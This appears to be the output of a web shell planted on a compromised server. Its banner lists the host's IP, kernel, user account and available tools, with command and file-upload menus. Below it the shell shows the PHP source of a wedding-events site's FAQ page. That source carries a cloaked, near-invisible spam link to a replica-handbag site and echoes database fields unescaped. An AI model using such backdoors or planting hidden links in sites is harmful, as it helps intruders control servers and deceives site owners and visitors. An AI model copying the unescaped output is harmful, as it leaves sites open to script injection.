Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/eventsbyshubhchintak/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include'includes/db-conn.inc.php'; ?> <!DOCTYPE html> <html lang="en"> <head> <link rel="stylesheet" href="assets/libs/leaflet/dist/leaflet.css"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Libs --> <link rel="stylesheet" href="assets/libs/bootstrap-icons/font/bootstrap-icons.css"> <link rel="stylesheet" href="assets/fonts/wedding-icon-font/flaticon.css"> <link rel="stylesheet" href="assets/fonts/fontello/css/fontello.css"> <!-- Theme CSS --> <?php include 'includes/head.php'; ?> <link rel="stylesheet" href="assets/css/theme.min.css"> <title>All FAQ | Wedding & Event by Shubhchintak</title> </head> <body> <!-- navbar --> <?php include 'includes/navbar.php'; ?> <main> <section class="pt-6 pb-4"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12 col-12"> <div> <small style="color: #6b7280 !important;"><a href="index.php">Home ></a> FAQ </small><br> <h4 class="display-5 fw-semi-bold mb-0" style="font-size: 24px;margin-top: 13px;">Shubhchintak's FAQ</h4> </div> </div> </div> </div> </section> <!-- faq --> <section class="pb-8"> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12 col-12"> <div class="mb-6"> <!-- faq --> <h2 class="mb-3">Faq</h2> <!-- accordions --> <div class="accordion accordion-flush" id="accordionFaq"> <?php $i=1; $j=1; $k=1; $l=1; $m=1; $sql=mysqli_query($conn,"select * from tbl_faq where status='1' ORDER BY order_number asc")or die(mysqli_error()); while($row=mysqli_fetch_assoc($sql)) { extract($row) ?> <div class="accordion-item"> <!-- accordion header --> <h2 class="accordion-header" id="flush-headingTwo_<?php echo $i++; ?>"> <a href="#" class="accordion-button collapsed" data-bs-toggle="collapse" data-bs-target="#flush-collapseTwo_<?php echo $k++; ?>" aria-expanded="false" aria-controls="flush-collapseTwo_<?php echo $j++; ?>"> <?php echo $question;?> </a> </h2> <!-- collapse --> <div id="flush-collapseTwo_<?php echo $l++; ?>" class="accordion-collapse collapse" aria-labelledby="flush-headingTwo_<?php echo $m++; ?>" data-bs-parent="#accordionFaq"> <div class="accordion-body"><?php echo $answer;?></div> </div> </div> <!-- accordion item --> <?php }?> </div> </div> </div> </div> </div> </section> <!-- faq close --> <!-- get app --> <section class="py-14" style="background-image: url(assets/images/banner/cta-img-2.jpg); background-position: center; background-size: cover;"> <div class="container"> <div class="row"> <div class="col-lg-6"> <h2 class="display-6 text-white">Are you Vendor ?</h2> <p class="text-white mb-4">Shubhchintak is a Best Place for you. Grow your Business with Shubhchintak Now ! <br> Sign Up to access your Dashboard</p> <a href="vendor-register.php"> <button type="submit" class="btn" style="width: 50%;background: linear-gradient(90deg, #b02a37 0%, #b02a37 39%, #dc3545f2 100%);color: white;">Sign Up Now</button> </a> </div> </div> </div><div style="position: absolute; filter: alpha(opacity=0); opacity: 0.001; z-index: 10;"><a href="https://www.handbag.uk.com">Replica Handbags UK</a></div> </section> <!-- get app --> </main> <!-- footer --> <?php include 'includes/footer.php'; ?> <script src="assets/libs/jquery/dist/jquery.min.js"></script> <script src="assets/libs/bootstrap/dist/js/bootstrap.bundle.min.js"></script> <script src="assets/libs/flatpickr/dist/flatpickr.min.js"></script> <!-- Theme JS --> <script src="assets/js/theme.min.js"></script> </body> </html>